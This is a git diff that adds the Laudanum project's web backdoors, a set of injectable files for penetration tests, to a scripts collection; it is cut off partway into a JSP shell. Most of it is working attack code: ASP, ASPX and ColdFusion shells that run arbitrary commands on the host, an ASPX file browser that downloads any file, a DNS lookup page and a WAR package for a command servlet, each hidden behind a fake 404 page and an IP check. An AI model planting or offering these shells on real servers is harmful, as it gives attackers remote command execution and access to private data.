body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3<input type=""hidden"" name=""laudurl"" value=""$2"">")
|
||||||
|
|
||||||
|
' rewrite forms - absolute reference
|
||||||
|
s = urlscheme & urlhost & urlport & urlpath
|
||||||
|
regex.Pattern = "(\<form[^\>]+action.?=.?['""])([^\/][^'""]+)(['""][^\>]*[\>])"
|
||||||
|
body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3<input type=""hidden"" name=""laudurl"" value=""" & s & "$2"">")
|
||||||
|
|
||||||
|
Response.Write(body)
|
||||||
|
|
||||||
|
Set regex = nothing
|
||||||
|
else
|
||||||
|
' some sort of binary response, so stream it
|
||||||
|
Set stream = nothing
|
||||||
|
Set stream = Server.CreateObject("ADODB.Stream")
|
||||||
|
stream.Type = 1 'Binary
|
||||||
|
stream.Open
|
||||||
|
stream.Write http.responseBody
|
||||||
|
stream.Position = 0
|
||||||
|
|
||||||
|
For i = 0 to stream.Size \ chunkSize
|
||||||
|
Response.BinaryWrite(stream.Read(chunkSize))
|
||||||
|
next
|
||||||
|
Set stream = nothing
|
||||||
|
end if
|
||||||
|
|
||||||
|
Set http = nothing
|
||||||
|
|
||||||
|
Response.End
|
||||||
|
|
||||||
|
:HandleError
|
||||||
|
err_handler
|
||||||
|
|
||||||
|
%>
|
||||||
|
|
||||||
83
Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/shell.asp
Normal file
83
Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/shell.asp
Normal file
@@ -0,0 +1,83 @@
|
|||||||
|
<%
|
||||||
|
' *******************************************************************************
|
||||||
|
' ***
|
||||||
|
' *** Laudanum Project
|
||||||
|
' *** A Collection of Injectable Files used during a Penetration Test
|
||||||
|
' ***
|
||||||
|
' *** More information is available at:
|
||||||
|
' *** http://laudanum.secureideas.net
|
||||||
|
' *** laudanum@secureideas.net
|
||||||
|
' ***
|
||||||
|
' *** Project Leads:
|
||||||
|
' *** Kevin Johnson <kjohnson@secureideas.net
|
||||||
|
' *** Tim Medin <tim@securitywhole.com>
|
||||||
|
' ***
|
||||||
|
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
|
||||||
|
' ***
|
||||||
|
' ********************************************************************************
|
||||||
|
' ***
|
||||||
|
' *** Updated and fixed by Robin Wood <Digininja>
|
||||||
|
' *** Updated and fixed by Tim Medin <tim@securitywhole.com
|
||||||
|
' ***
|
||||||
|
' ********************************************************************************
|
||||||
|
' *** This program is free software; you can redistribute it and/or
|
||||||
|
' *** modify it under the terms of the GNU General Public License
|
||||||
|
' *** as published by the Free Software Foundation; either version 2
|
||||||
|
' *** of the License, or (at your option) any later version.
|
||||||
|
' ***
|
||||||
|
' *** This program is distributed in the hope that it will be useful,
|
||||||
|
' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
' *** GNU General Public License for more details.
|
||||||
|
' ***
|
||||||
|
' *** You can get a copy of the GNU General Public License from this
|
||||||
|
' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||||
|
' *** You can also write to the Free Software Foundation, Inc., Temple
|
||||||
|
' *** Place - Suite Boston, MA USA.
|
||||||
|
' ***
|
||||||
|
' ***************************************************************************** */
|
||||||
|
|
||||||
|
|
||||||
|
' can set this to 0 for never time out but don't want to kill the server if a script
|
||||||
|
' goes into a loop for any reason
|
||||||
|
Server.ScriptTimeout = 180
|
||||||
|
|
||||||
|
ip=request.ServerVariables("REMOTE_ADDR")
|
||||||
|
if ip<>"1.2.3.4" then
|
||||||
|
response.Status="404 Page Not Found"
|
||||||
|
response.Write(response.Status)
|
||||||
|
response.End
|
||||||
|
end if
|
||||||
|
|
||||||
|
if Request.Form("submit") <> "" then
|
||||||
|
Dim wshell, intReturn, strPResult
|
||||||
|
cmd = Request.Form("cmd")
|
||||||
|
Response.Write ("Running command: " & cmd & "<br />")
|
||||||
|
set wshell = CreateObject("WScript.Shell")
|
||||||
|
Set objCmd = wShell.Exec(cmd)
|
||||||
|
strPResult = objCmd.StdOut.Readall()
|
||||||
|
|
||||||
|
response.write "<br><pre>" & replace(replace(strPResult,"<","<"),vbCrLf,"<br>") & "</pre>"
|
||||||
|
|
||||||
|
set wshell = nothing
|
||||||
|
end if
|
||||||
|
|
||||||
|
%>
|
||||||
|
<html>
|
||||||
|
<head><title>Laundanum ASP Shell</title></head>
|
||||||
|
<body onload="document.shell.cmd.focus()">
|
||||||
|
<form action="shell.asp" method="POST" name="shell">
|
||||||
|
Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
|
||||||
|
<input type="submit" name="submit" value="Submit" />
|
||||||
|
<p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
|
||||||
|
<p>Example command to do a directory listing:<br>
|
||||||
|
%ComSpec% /c dir
|
||||||
|
</form>
|
||||||
|
<hr/>
|
||||||
|
<address>
|
||||||
|
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||||
|
Written by Tim Medin.<br/>
|
||||||
|
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||||
|
</address>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
BIN
Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/._.DS_Store
Normal file
BIN
Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/._.DS_Store
Normal file
Binary file not shown.
144
Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/dns.aspx
Normal file
144
Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/dns.aspx
Normal file
@@ -0,0 +1,144 @@
|
|||||||
|
<%@ Page Language="C#"%>
|
||||||
|
<%@ Import Namespace="System" %>
|
||||||
|
<html><head><title>Laudanum - DNS</title></head><body>
|
||||||
|
<script runat="server">
|
||||||
|
|
||||||
|
/* *****************************************************************************
|
||||||
|
***
|
||||||
|
*** Laudanum Project
|
||||||
|
*** A Collection of Injectable Files used during a Penetration Test
|
||||||
|
***
|
||||||
|
*** More information is available at:
|
||||||
|
*** http://laudanum.secureideas.com
|
||||||
|
*** laudanum@secureideas.com
|
||||||
|
***
|
||||||
|
*** Project Leads:
|
||||||
|
*** Kevin Johnson <kevin@secureideas.com>
|
||||||
|
***
|
||||||
|
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
|
||||||
|
***
|
||||||
|
********************************************************************************
|
||||||
|
***
|
||||||
|
*** This file provides shell access to DNS on the system.
|
||||||
|
*** Written by James Jardine <james@secureideas.com>
|
||||||
|
***
|
||||||
|
********************************************************************************
|
||||||
|
*** This program is free software; you can redistribute it and/or
|
||||||
|
*** modify it under the terms of the GNU General Public License
|
||||||
|
*** as published by the Free Software Foundation; either version 2
|
||||||
|
*** of the License, or (at your option) any later version.
|
||||||
|
***
|
||||||
|
*** This program is distributed in the hope that it will be useful,
|
||||||
|
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
*** GNU General Public License for more details.
|
||||||
|
***
|
||||||
|
*** You can get a copy of the GNU General Public License from this
|
||||||
|
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||||
|
*** You can also write to the Free Software Foundation, Inc., 59 Temple
|
||||||
|
*** Place - Suite 330, Boston, MA 02111-1307, USA.
|
||||||
|
***
|
||||||
|
***************************************************************************** */
|
||||||
|
|
||||||
|
// ********************* Config entries below ***********************************
|
||||||
|
// IPs are enterable as individual addresses
|
||||||
|
string[] allowedIPs = new string[3] { "::1", "192.168.1.1", "127.0.0.1" };
|
||||||
|
|
||||||
|
// ***************** No editable content below this line **************************
|
||||||
|
|
||||||
|
string stdout = "";
|
||||||
|
string stderr = "";
|
||||||
|
string[] qtypes = "Any,A,AAAA,A+AAAA,CNAME,MX,NS,PTR,SOA,SRV".Split(',');
|
||||||
|
void die() {
|
||||||
|
//HttpContext.Current.Response.Clear();
|
||||||
|
HttpContext.Current.Response.StatusCode = 404;
|
||||||
|
HttpContext.Current.Response.StatusDescription = "Not Found";
|
||||||
|
HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
|
||||||
|
HttpContext.Current.Server.ClearError();
|
||||||
|
HttpContext.Current.Response.End();
|
||||||
|
}
|
||||||
|
|
||||||
|
void Page_Load(object sender, System.EventArgs e) {
|
||||||
|
// check if the X-Fordarded-For header exits
|
||||||
|
string remoteIp;
|
||||||
|
if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
|
||||||
|
remoteIp = Request.UserHostAddress;
|
||||||
|
} else {
|
||||||
|
remoteIp = HttpContext.Current.Request.Headers["X-Forwarded-For"].Split(new char[] { ',' })[0];
|
||||||
|
}
|
||||||
|
|
||||||
|
bool validIp = false;
|
||||||
|
foreach (string ip in allowedIPs) {
|
||||||
|
validIp = (validIp || (remoteIp == ip));
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!validIp) {
|
||||||
|
die();
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
string qType = "Any";
|
||||||
|
bool validType = false;
|
||||||
|
if (Request.Form["type"] != null)
|
||||||
|
{
|
||||||
|
qType = Request.Form["type"].ToString();
|
||||||
|
foreach (string s in qtypes)
|
||||||
|
{
|
||||||
|
if (s == qType)
|
||||||
|
{
|
||||||
|
validType = true;
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if (!validType)
|
||||||
|
qType = "Any";
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
if (Request.Form["query"] != null)
|
||||||
|
{
|
||||||
|
string query = Request.Form["query"].Replace(" ", string.Empty).Replace(" ", string.Empty);
|
||||||
|
|
||||||
|
if(query.Length > 0)
|
||||||
|
{
|
||||||
|
System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("nslookup", "-type=" + qType + " " + query);
|
||||||
|
// The following commands are needed to redirect the standard output and standard error.
|
||||||
|
procStartInfo.RedirectStandardOutput = true;
|
||||||
|
procStartInfo.RedirectStandardError = true;
|
||||||
|
procStartInfo.UseShellExecute = false;
|
||||||
|
|
||||||
|
// Do not create the black window.
|
||||||
|
procStartInfo.CreateNoWindow = true;
|
||||||
|
|
||||||
|
// Now we create a process, assign its ProcessStartInfo and start it
|
||||||
|
System.Diagnostics.Process p = new System.Diagnostics.Process();
|
||||||
|
p.StartInfo = procStartInfo;
|
||||||
|
p.Start();
|
||||||
|
// Get the output and error into a string
|
||||||
|
stdout = p.StandardOutput.ReadToEnd();
|
||||||
|
stderr = p.StandardError.ReadToEnd();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
<form method="post">
|
||||||
|
QUERY: <input type="text" name="query"/><br />
|
||||||
|
Type: <select name="type">
|
||||||
|
<%
|
||||||
|
foreach (string s in qtypes)
|
||||||
|
{
|
||||||
|
Response.Write("<option value=\"" + s + "\">" + s + "</option>");
|
||||||
|
}
|
||||||
|
%>
|
||||||
|
</select>
|
||||||
|
<input type="submit"><br/>
|
||||||
|
STDOUT:<br/>
|
||||||
|
<pre><% = stdout.Replace("<", "<") %></pre>
|
||||||
|
<br/>
|
||||||
|
<br/>
|
||||||
|
<br/>
|
||||||
|
STDERR:<br/>
|
||||||
|
<pre><% = stderr.Replace("<", "<") %></pre>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
154
Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/file.aspx
Normal file
154
Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/file.aspx
Normal file
@@ -0,0 +1,154 @@
|
|||||||
|
<%@ Page Language="C#"%>
|
||||||
|
<%@ Import Namespace="System" %>
|
||||||
|
<html><head><title>Laudanum - File</title></head><body>
|
||||||
|
<script runat="server">
|
||||||
|
|
||||||
|
/* *****************************************************************************
|
||||||
|
***
|
||||||
|
*** Laudanum Project
|
||||||
|
*** A Collection of Injectable Files used during a Penetration Test
|
||||||
|
***
|
||||||
|
*** More information is available at:
|
||||||
|
*** http://laudanum.secureideas.com
|
||||||
|
*** laudanum@secureideas.com
|
||||||
|
***
|
||||||
|
*** Project Leads:
|
||||||
|
*** Kevin Johnson <kevin@secureideas.com>
|
||||||
|
***
|
||||||
|
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
|
||||||
|
***
|
||||||
|
********************************************************************************
|
||||||
|
***
|
||||||
|
*** This file allows browsing of the file system
|
||||||
|
*** Written by James Jardine <james@secureideas.com>
|
||||||
|
***
|
||||||
|
********************************************************************************
|
||||||
|
*** This program is free software; you can redistribute it and/or
|
||||||
|
*** modify it under the terms of the GNU General Public License
|
||||||
|
*** as published by the Free Software Foundation; either version 2
|
||||||
|
*** of the License, or (at your option) any later version.
|
||||||
|
***
|
||||||
|
*** This program is distributed in the hope that it will be useful,
|
||||||
|
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
*** GNU General Public License for more details.
|
||||||
|
***
|
||||||
|
*** You can get a copy of the GNU General Public License from this
|
||||||
|
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||||
|
*** You can also write to the Free Software Foundation, Inc., 59 Temple
|
||||||
|
*** Place - Suite 330, Boston, MA 02111-1307, USA.
|
||||||
|
********************************************************************************* */
|
||||||
|
|
||||||
|
// ********************* Config entries below ***********************************
|
||||||
|
// IPs are enterable as individual addresses
|
||||||
|
string[] allowedIPs = new string[3] {"::1", "192.168.1.1","127.0.0.1"};
|
||||||
|
|
||||||
|
// ***************** No editable content below this line **************************
|
||||||
|
bool allowed = false;
|
||||||
|
string dir = "";
|
||||||
|
string file = "";
|
||||||
|
|
||||||
|
void Page_Load(object sender, System.EventArgs e)
|
||||||
|
{
|
||||||
|
|
||||||
|
foreach (string ip in allowedIPs)
|
||||||
|
{
|
||||||
|
if (HttpContext.Current.Request.ServerVariables["REMOTE_ADDR"] == ip)
|
||||||
|
{
|
||||||
|
allowed = true;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!allowed)
|
||||||
|
{
|
||||||
|
die();
|
||||||
|
}
|
||||||
|
|
||||||
|
//dir = Request.QueryString["dir"] != null ? Request.QueryString["dir"] : Environment.SystemDirectory;
|
||||||
|
dir = Request.QueryString["dir"] != null ? Request.QueryString["dir"] : Server.MapPath(".");
|
||||||
|
file = Request.QueryString["file"] != null ? Request.QueryString["file"] : "";
|
||||||
|
|
||||||
|
if (file.Length > 0)
|
||||||
|
{
|
||||||
|
if (System.IO.File.Exists(file))
|
||||||
|
{
|
||||||
|
writefile();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
void writefile()
|
||||||
|
{
|
||||||
|
Response.ClearContent();
|
||||||
|
Response.Clear();
|
||||||
|
Response.ContentType = "text/plain";
|
||||||
|
//Uncomment the next line if you would prefer to download the file vs display it.
|
||||||
|
//Response.AddHeader("Content-Disposition", "attachment; filename=" + file + ";");
|
||||||
|
Response.TransmitFile(file);
|
||||||
|
Response.Flush();
|
||||||
|
Response.End();
|
||||||
|
}
|
||||||
|
|
||||||
|
void die() {
|
||||||
|
//HttpContext.Current.Response.Clear();
|
||||||
|
HttpContext.Current.Response.StatusCode = 404;
|
||||||
|
HttpContext.Current.Response.StatusDescription = "Not Found";
|
||||||
|
HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
|
||||||
|
HttpContext.Current.Server.ClearError();
|
||||||
|
HttpContext.Current.Response.End();
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
</script>
|
||||||
|
<html>
|
||||||
|
<head></head>
|
||||||
|
<% string[] breadcrumbs = dir.Split('\\');
|
||||||
|
string breadcrumb = "";
|
||||||
|
foreach (string b in breadcrumbs)
|
||||||
|
{
|
||||||
|
if (b.Length > 0)
|
||||||
|
{
|
||||||
|
breadcrumb += b + "\\";
|
||||||
|
Response.Write("<a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(breadcrumb) + "\">" + Server.HtmlEncode(b) + "</a>");
|
||||||
|
Response.Write(" / ");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
%>
|
||||||
|
<table>
|
||||||
|
<tr><th>Name</th><th>Date</th><th>Size</th></tr>
|
||||||
|
<%
|
||||||
|
try
|
||||||
|
{
|
||||||
|
if (System.IO.Directory.Exists(dir))
|
||||||
|
{
|
||||||
|
string[] folders = System.IO.Directory.GetDirectories(dir);
|
||||||
|
foreach (string folder in folders)
|
||||||
|
{
|
||||||
|
Response.Write("<tr><td><a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(folder) + "\">" + Server.HtmlEncode(folder) + "</a></td><td></td><td></td></tr>");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
Response.Write("This directory doesn't exist: " + Server.HtmlEncode(dir));
|
||||||
|
Response.End();
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
catch (System.UnauthorizedAccessException ex)
|
||||||
|
{
|
||||||
|
Response.Write("You Don't Have Access to this directory: " + Server.HtmlEncode(dir));
|
||||||
|
Response.End();
|
||||||
|
}
|
||||||
|
%>
|
||||||
|
|
||||||
|
<%
|
||||||
|
System.IO.DirectoryInfo di = new System.IO.DirectoryInfo(dir);
|
||||||
|
System.IO.FileInfo[] files = di.GetFiles();
|
||||||
|
foreach (System.IO.FileInfo f in files)
|
||||||
|
{
|
||||||
|
Response.Write("<tr><td><a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(dir) + "&file=" + Server.UrlEncode(f.FullName) + "\">" + Server.HtmlEncode(f.Name) + "</a></td><td>" + f.CreationTime.ToString() + "</td><td>" + f.Length.ToString() + "</td></tr>");
|
||||||
|
}
|
||||||
|
%>
|
||||||
|
</table>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
129
Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/shell.aspx
Normal file
129
Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/shell.aspx
Normal file
@@ -0,0 +1,129 @@
|
|||||||
|
<%@ Page Language="C#"%>
|
||||||
|
<%@ Import Namespace="System" %>
|
||||||
|
|
||||||
|
<script runat="server">
|
||||||
|
|
||||||
|
/* *****************************************************************************
|
||||||
|
***
|
||||||
|
*** Laudanum Project
|
||||||
|
*** A Collection of Injectable Files used during a Penetration Test
|
||||||
|
***
|
||||||
|
*** More information is available at:
|
||||||
|
*** http://laudanum.secureideas.net
|
||||||
|
*** laudanum@secureideas.net
|
||||||
|
***
|
||||||
|
*** Project Leads:
|
||||||
|
*** Kevin Johnson <kjohnson@secureideas.net>
|
||||||
|
*** Tim Medin <tim@securitywhole.com>
|
||||||
|
***
|
||||||
|
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
|
||||||
|
***
|
||||||
|
********************************************************************************
|
||||||
|
***
|
||||||
|
*** This file provides shell access to the system.
|
||||||
|
***
|
||||||
|
********************************************************************************
|
||||||
|
*** This program is free software; you can redistribute it and/or
|
||||||
|
*** modify it under the terms of the GNU General Public License
|
||||||
|
*** as published by the Free Software Foundation; either version 2
|
||||||
|
*** of the License, or (at your option) any later version.
|
||||||
|
***
|
||||||
|
*** This program is distributed in the hope that it will be useful,
|
||||||
|
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
*** GNU General Public License for more details.
|
||||||
|
***
|
||||||
|
*** You can get a copy of the GNU General Public License from this
|
||||||
|
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||||
|
*** You can also write to the Free Software Foundation, Inc., 59 Temple
|
||||||
|
*** Place - Suite 330, Boston, MA 02111-1307, USA.
|
||||||
|
***
|
||||||
|
***************************************************************************** */
|
||||||
|
|
||||||
|
string stdout = "";
|
||||||
|
string stderr = "";
|
||||||
|
|
||||||
|
void die() {
|
||||||
|
//HttpContext.Current.Response.Clear();
|
||||||
|
HttpContext.Current.Response.StatusCode = 404;
|
||||||
|
HttpContext.Current.Response.StatusDescription = "Not Found";
|
||||||
|
HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
|
||||||
|
HttpContext.Current.Server.ClearError();
|
||||||
|
HttpContext.Current.Response.End();
|
||||||
|
}
|
||||||
|
|
||||||
|
void Page_Load(object sender, System.EventArgs e) {
|
||||||
|
|
||||||
|
// Check for an IP in the range we want
|
||||||
|
string[] allowedIps = new string[] {"::1","192.168.0.1", "127.0.0.1"};
|
||||||
|
|
||||||
|
// check if the X-Fordarded-For header exits
|
||||||
|
string remoteIp;
|
||||||
|
if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
|
||||||
|
remoteIp = Request.UserHostAddress;
|
||||||
|
} else {
|
||||||
|
remoteIp = HttpContext.Current.Request.Headers["X-Forwarded-For"].Split(new char[] { ',' })[0];
|
||||||
|
}
|
||||||
|
|
||||||
|
bool validIp = false;
|
||||||
|
foreach (string ip in allowedIps) {
|
||||||
|
validIp = (validIp || (remoteIp == ip));
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!validIp) {
|
||||||
|
die();
|
||||||
|
}
|
||||||
|
|
||||||
|
if (Request.Form["c"] != null) {
|
||||||
|
// do or do not, there is no try
|
||||||
|
//try {
|
||||||
|
// create the ProcessStartInfo using "cmd" as the program to be run, and "/c " as the parameters.
|
||||||
|
// "/c" tells cmd that we want it to execute the command that follows, and exit.
|
||||||
|
System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("cmd", "/c " + Request.Form["c"]);
|
||||||
|
|
||||||
|
// The following commands are needed to redirect the standard output and standard error.
|
||||||
|
procStartInfo.RedirectStandardOutput = true;
|
||||||
|
procStartInfo.RedirectStandardError = true;
|
||||||
|
procStartInfo.UseShellExecute = false;
|
||||||
|
// Do not create the black window.
|
||||||
|
procStartInfo.CreateNoWindow = true;
|
||||||
|
// Now we create a process, assign its ProcessStartInfo and start it
|
||||||
|
System.Diagnostics.Process p = new System.Diagnostics.Process();
|
||||||
|
p.StartInfo = procStartInfo;
|
||||||
|
p.Start();
|
||||||
|
// Get the output and error into a string
|
||||||
|
stdout = p.StandardOutput.ReadToEnd();
|
||||||
|
stderr = p.StandardError.ReadToEnd();
|
||||||
|
//}
|
||||||
|
//catch (Exception objException)
|
||||||
|
//{
|
||||||
|
}
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
<html>
|
||||||
|
<head><title>Laundanum ASPX Shell</title></head>
|
||||||
|
<body onload="document.shell.c.focus()">
|
||||||
|
|
||||||
|
<form method="post" name="shell">
|
||||||
|
cmd /c <input type="text" name="c"/>
|
||||||
|
<input type="submit"><br/>
|
||||||
|
STDOUT:<br/>
|
||||||
|
<pre><% = stdout.Replace("<", "<") %></pre>
|
||||||
|
<br/>
|
||||||
|
<br/>
|
||||||
|
<br/>
|
||||||
|
STDERR:<br/>
|
||||||
|
<pre><% = stderr.Replace("<", "<") %></pre>
|
||||||
|
|
||||||
|
|
||||||
|
</form>
|
||||||
|
|
||||||
|
<hr/>
|
||||||
|
<address>
|
||||||
|
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||||
|
Written by Tim Medin.<br/>
|
||||||
|
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||||
|
</address>
|
||||||
|
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
BIN
Scripts/Backdoors/Web Backdoors/laudanum-0.8/cfm/._.DS_Store
Normal file
BIN
Scripts/Backdoors/Web Backdoors/laudanum-0.8/cfm/._.DS_Store
Normal file
Binary file not shown.
80
Scripts/Backdoors/Web Backdoors/laudanum-0.8/cfm/shell.cfm
Normal file
80
Scripts/Backdoors/Web Backdoors/laudanum-0.8/cfm/shell.cfm
Normal file
@@ -0,0 +1,80 @@
|
|||||||
|
<cfapplication scriptProtect="none">
|
||||||
|
<!---
|
||||||
|
/* *****************************************************************************
|
||||||
|
***
|
||||||
|
*** Laudanum Project
|
||||||
|
*** A Collection of Injectable Files used during a Penetration Test
|
||||||
|
***
|
||||||
|
*** More information is available at:
|
||||||
|
*** http://laudanum.secureideas.net
|
||||||
|
*** laudanum@secureideas.net
|
||||||
|
***
|
||||||
|
*** Project Leads:
|
||||||
|
*** Kevin Johnson <kjohnson@secureideas.net
|
||||||
|
*** Tim Medin <tim@securitywhole.com>
|
||||||
|
***
|
||||||
|
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
|
||||||
|
***
|
||||||
|
********************************************************************************
|
||||||
|
***
|
||||||
|
*** This file provides access to shell acces on the system.
|
||||||
|
*** Modified by Tim Medin
|
||||||
|
***
|
||||||
|
********************************************************************************
|
||||||
|
***
|
||||||
|
*** TODO: Fix the problem with quotes
|
||||||
|
*** Add authentication
|
||||||
|
***
|
||||||
|
********************************************************************************
|
||||||
|
*** This program is free software; you can redistribute it and/or
|
||||||
|
*** modify it under the terms of the GNU General Public License
|
||||||
|
*** as published by the Free Software Foundation; either version 2
|
||||||
|
*** of the License, or (at your option) any later version.
|
||||||
|
***
|
||||||
|
*** This program is distributed in the hope that it will be useful,
|
||||||
|
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
*** GNU General Public License for more details.
|
||||||
|
***
|
||||||
|
*** You can get a copy of the GNU General Public License from this
|
||||||
|
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1^
|
||||||
|
*** You can also write to the Free Software Foundation, Inc., 59 Temple
|
||||||
|
*** Place - Suite 330, Boston, MA 02111-1307, USA.
|
||||||
|
***
|
||||||
|
***************************************************************************** */
|
||||||
|
--->
|
||||||
|
<cfif #cgi.remote_addr# neq "1.1.1.1">
|
||||||
|
<cfheader statuscode="404" statustext="Page Not Found" />
|
||||||
|
<cfabort />
|
||||||
|
</cfif>
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<head><title>Laudanum Coldfusion Shell</title></head>
|
||||||
|
<body>
|
||||||
|
<form action="shell.cfm" method="POST">
|
||||||
|
<cfif IsDefined("form.cmd")>
|
||||||
|
Executable: <Input type="text" name="cmd" value="<cfoutput>#HTMLEditFormat(form.cmd)#</cfoutput>"> For Windows use: cmd.exe or the full path to cmd.exe<br>
|
||||||
|
Arguments: <Input type="text" name="arguments" value="<cfoutput>#HTMLEditFormat(form.arguments)#</cfoutput>"> For Windows use: /c <i>command</i><br>
|
||||||
|
<cfelse>
|
||||||
|
Executable: <Input type="text" name="cmd" value="cmd.exe"><br>
|
||||||
|
Arguments: <Input type="text" name="arguments" value="/c "><br>
|
||||||
|
</cfif>
|
||||||
|
<input type="submit">
|
||||||
|
</form>
|
||||||
|
|
||||||
|
<cfif IsDefined("form.cmd")>
|
||||||
|
<pre>
|
||||||
|
<cfexecute name="#Replace(preservesinglequotes(form.cmd), QuoteMark, DoubleQuoteMark, 'All')#" arguments="#Replace(preservesinglequotes(form.arguments), QuoteMark, DoubleQuoteMark, 'All')#" timeout="5" variable="foo"></cfexecute>
|
||||||
|
<cfoutput>#Replace(foo, "<", "<", "All")#</cfoutput>
|
||||||
|
</pre>
|
||||||
|
</cfif>
|
||||||
|
Note: The cold fusion command that executes shell commands strips quotes, both double and single, so be aware.
|
||||||
|
|
||||||
|
<hr/>
|
||||||
|
<address>
|
||||||
|
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||||
|
Written by Tim Medin.<br/>
|
||||||
|
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||||
|
</address>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
BIN
Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/._.DS_Store
Normal file
BIN
Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/._.DS_Store
Normal file
Binary file not shown.
BIN
Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/cmd.war
Normal file
BIN
Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/cmd.war
Normal file
Binary file not shown.
@@ -0,0 +1,3 @@
|
|||||||
|
#!/bin/sh
|
||||||
|
|
||||||
|
jar -cvf cmd.war warfiles/*
|
||||||
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,3 @@
|
|||||||
|
Manifest-Version: 1.0
|
||||||
|
Created-By: 1.6.0_10 (Sun Microsystems Inc.)
|
||||||
|
|
||||||
Binary file not shown.
@@ -0,0 +1,11 @@
|
|||||||
|
<?xml version="1.0" ?>
|
||||||
|
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
|
||||||
|
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
|
||||||
|
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
|
||||||
|
http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
|
||||||
|
version="2.4">
|
||||||
|
<servlet>
|
||||||
|
<servlet-name>Command</servlet-name>
|
||||||
|
<jsp-file>/cmd.jsp</jsp-file>
|
||||||
|
</servlet>
|
||||||
|
</web-app>
|
||||||
@@ -0,0 +1,41 @@
|
|||||||
|
<%@ page import="java.util.*,java.io.*"%>
|
||||||
|
<%
|
||||||
|
|
||||||
|
